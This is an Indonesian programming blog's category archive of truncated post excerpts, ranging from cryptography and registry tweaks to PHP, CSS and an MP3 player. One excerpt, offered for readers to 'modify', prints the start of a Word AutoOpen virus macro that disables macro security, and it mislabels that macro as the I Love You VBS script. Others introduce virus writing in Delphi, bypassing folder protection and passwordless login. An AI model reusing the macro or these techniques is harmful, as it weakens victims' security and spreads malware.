Archive for the ‘Pemrograman’ Category

cryptography : Simple a-symetric algorithm

Secara umum adalah ilmu dan seni untuk menjaga kerahasiaan berita ilmu yang mempelajari teknik matematika yang berhubungan dengan aspek keamanan informasi seperti : Kerahasiaan data, keabsahan data, integritas data, autentikasi. Untuk pengertian tersebut teman-teman bisa melihat detailnya di wikipedia…:P karena aku ambil bahannya dari situ. === II. Algoritma Sandi Nah untuk melakukan tujuan kriptografi tersebut [...]

20 Hack Registry untuk Tingkatkan Kinerja PC (bagian 2)

7. Enkripsi dengan Mudah Beberapa versi Windows memungkinkan Anda untuk mengenkripsi file, walaupun prosesnya agak aneh. Anda harus mengklik-kanan pada file, pilih “properties“, tekan tombol “Advanced, cek “Encrypt contents to secure data“, dan tekan “OK” sebanyak 2x. Untuk cara yang lebih sederhana, masuk ke “HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvanced” buat DWORD yang bernama “EncryptionContextMenu” dan atur nilainya menjadi “1″. [...]

MEMBUKA APPLIKASI JAVA (.JAR) Di Komputer PC

Anda pernah berfikir untuk membuat file .jar menjadi kompetile dengan PC ?? ya tentu pasti pernah ada pikiran begitu. ini ada beberapa trik untuk mengubah file .jar menjadi komptetible dengan PC. Namun saya sarankan menggunakan komputer PC ya, bukan laptop. tapi itu hanya saran saja, karena jika menggunakan laptop beberapa funfsi tombol angka pada applikasi [...]

7 Langkah Menghentikan Banjir Virus Shortcut

Virus PIF/Starter atau yang lebih dikenal dengan virus shortcut membuat kesal korbannya dengan banyak sekali shortcut yang dibuat oleh virus tersebut. Repotnya, kalau cara penanganan virus ini tak tepat maka ia malah akan kembali lagi, lagi dan lagi. Oleh sebab itu, simak 7 cara jitu dari analis virus Vaksincom MG Lat untuk menghentikan banjir shortcut [...]

Perintah Perintah Dasar Linux

Seperti halnya bila kita mengetikkan perintah di DOS, command line atau baris perintah di Linux juga diketikkan di prompt dan diakhiri dengan menekan tombol Enter pada keyboard untuk mengeksekusi perintah tersebut. Baris perintah merupakan cara yang lebih efisien untuk melakukan sesuatu pekerjaan. Oleh karena itu pemakai Linux tetap mengandalkan cara ini untuk bekerja. Sebaiknya pemula [...]

Cara Mengunci Folder Tanpa Aplikasi Tambahan

Pernah mempunyai file2 penting dan bersifat personal? takut orang selain anda dapat mengaksesnya? Setelah melakukan googling, saya menemukan sebuah trik di sebuah websitebagus untuk mengunci sebuah folder tanpa menggunakan aplikasi tambahan. Pada web tersebut dijelaskan penggunaan script batch untuk mengunci dan menyembunyikan sebuah folder dimana dalam folder itulah kita simpan data-data atau file-file prribadi kita. [...]

Create Virus and Registry Manipulation With Delphi

Registry tu apa sih? Kenapa virus lokal rata-rata menyerang registry? Simple aja, karena windows dapat melakukan fungsinya didukung dengan komponen yang dinamakan dengan registry… boleh gak ya registry di katakan sebagai jantung-nya windows? Mungkin aja sih, karena di dalam registry ini banyak terisi oleh kumpulan data yang rata-rata berfungsi untuk menngatur windows itu sendiri serta [...]

Cara Kilat Bikin Web Auto Pilot untuk Pemula

Melalui buku ini, Anda dapat belajar cara membuat sebuah web dengan sistem Auto Pilot. Sistem ini dikenal sangat memudahkan pengelola web dalam mengelola data member. Hanya dengan melakukan beberapa klik, waktu pengakitifan member dan pengiriman pesan kepada member atau calon member menjadi lebih singkat. Jika Anda seorang internet marketer, Web Auto Pilot ini sangat membantu [...]

Trik Lewati Proteksi Universal Shield v.4.1

Hai temen – temen virologers… aku ingin berbagi sedikit pengalaman tentang Trik Lewati Proteksi Universal Shield v.4.1. Itupun jika temen temen berkenan untuk membacanya.. Yupz, langsung aja.. Tujuan : Menyelamatkan Item yang terproteksi jika kita lupa akan password dan short key untuk launch program. Sekilas program : —————– Universal Shield adalah program untuk melindungi Drive, [...]

Tutorial Membuat image atau gambar dinamis on the fly dengan PHP

Anda ingin menghasilkan gambar atau teks dalam bentuk image dengan PHP? Artikel ini menginformasikan fungsi-fungsi penting dan contoh kodenya. PHP menyediakan fungsi-fungsi untuk menangani image, penulis akan menerangkan satu per satu fungsi yang berguna untuk itu. Berikut ini adalah fungsi-fungsi yang cukup penting dalam menangani image di PHP: – resource imagecreate ( int x_size, int [...]

Membuat Mp3 Player

Mp3 player merupakan software yang dibutuhkan untuk memutar lagu berformat mp3 pada komputer Anda. Untuk membuat mp3 Player kita hanya membutuhkan beberapa Item yaitu: 1. Commandbutton (5) 2. Listbox (3) 3. CommonControlDialog (1) 4. MediaPlayer (1) Ket: untuk menambahkan item seperti Mediaplayer dapat menambahkan dengan menekan tombol ctrl+t. Dan untuk mediaplayer, list1 dan list3 ubah [...]

Virus w32.leena@4r1f worm Leena dari Magelang

Virus : w32.leena@4r1f Nilai Crc32 : FEB4E332 Ukuran : 76 kb CIRI – CIRI YANG TERKENA VIRUS Jika anda sudah terkena virus ini, maka ciri – cirinya akan ditandai sbb: 1. File .doc akan disembunyikan oleh worm ini 2. Menu shutdown hilang 3. Registry di blok 4. Folder Options di windows explorer menghilang 5. msconfig [...]

HACKING, CRACKING, CARDING, PHISING, SPAMMING, DEFACING, dsb…

Indonesia bukan hanya terkenal sebagai negara terkorup di dunia, melainkan juga Negara dengan “carder” tertinggi di muka bumi, setelah Ukrania. “carder” adalah penjahat di internet, yang membeli barang di toko maya (online shoping) dengan memakai kartu kredit milik orang lain. Meski pengguna internet Indonesia masih sedikit dibanding negara Asia Tenggara lainnya, apalagi dibanding Asia atau [...]

Melindungi File EXE (Portable Executable)

Jangan merasa file bikinan anda aman jika kamu hanya ngecompress nya pake compressor/packer (UPX , ASPACK , MEW , PECOMPACT , dll ) , memang benar kalo struktur file menjadi tidak sama dengan file aslinya ketika kita kompress, Tapi jangan pernah berfikir kalau apa yang udah di pack ga bakal bisa dibalikin lagi ke awalnya, [...]

4 Cara Mudah Login tanpa Password

Seberapa amankah komputer anda dari tangan-tangan orang yang tidak bertanggung jawab ? Mungkin pertanyaan itu sering didengar oleh anda. Nah ada sebagian orang yang menganggap komputernya akan aman dari tangan-tangan jail karena telah dipasang password saat login. Tapi sepertinya saat ini anda jangan terlalu percaya dengan hanya memproteksi komputer dengan password login walaupun anda menggunakan [...]

Membuat 2 Kolom dengan header dan footer

Buat teman-teman yang ingin belajar memodifikasi header dan footer atau belajar mencoba-coba mengubah header dan footer website menggunakan CSS dan HTML, berikut ini sedikit penjelasannya. Selamat belajar! Cara membuat 2 kolom dengan header dan footer. Tentu saja Pakai CSS. Pertama kita tulis dulu kode HTML -nya. <div id=”container”> <h1> <!– Pakai h1 biar SEO bagus–> [...]

20 Hack Registry untuk Tingkatkan Kinerja PC (bagian 3)

14. Percepat Back-Up Fitur NTCBACKUP milik Windows XP meningkatkan kinerjanya dengan mempertahankan daftar file sistem yang ia tahu kalau Anda tidak akan mungkin ingin membuat back-upnya. Tambahkan file dan folder yang Anda inginkan sendiri dan dapatkan hasil yang lebih baik lagi. Lihat daftarnya pada “HKLMSYSTEMCurrentControlSetControlBackupRestoreFileNotToBackup“. 15. Ubah Folder Instalasi Default Kebanyakan instalasi default adalah folder [...]

Software yang harus dimiliki para blogger/webmaster

Kebutuhan akan software untuk mennunjang aktifitas ngeblog para blogger saat ini sangat tinggi. Semakin banyaknya aplikasi yang memberikan fasilitas bagus dan dibutuhkan oleh para blogger/webmaster. berdasarkan pengalaman dan pengamatan omjun (ce ile… kayak pakar aja,,,) ada beberapa software dan aplikasi yang paling banyak digunakan oleh para blogger/webmaster… omjun akan bagi dalam 5 bagian. 1. software [...]

Source Code I Love You.VBS

Berikut ini merupakan source code dari virus yang bernama I Love You.vbs. Silakan Anda modifikasi atau mungkin yang terinfeksi bisa mengetahui cara untuk menghilangkan virus tersebut dari komputer. Private Sub AutoOpen() On Error Resume Next p$ = “clone” If System.PrivateProfileString(””, “HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0WordSecurity”, “Level”) <> “” Then CommandBars(”Macro”).Controls(”Security…”).Enabled = False System.PrivateProfileString(””, “HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0WordSecurity”, “Level”) = 1& Else p$ [...]

Windows itu LUCU & ANEH ya?

Kalau biasanya kita belajar serius, sekarang kita nyante aja ya…? Setuju? Sekarang kita akan main-main dengan windows, sistem operasi yang paling populer saat ini. Ada 6 permainan yang akan kita lakukan. Alatnya: notepad. Jadi nggak butuh software yang macem-macem. Anda akan terheran-heran & geleng-geleng kepala. Okey sudah siap? Lanjut… Permainan ke-1: Cek apakah antivirus Anda [...]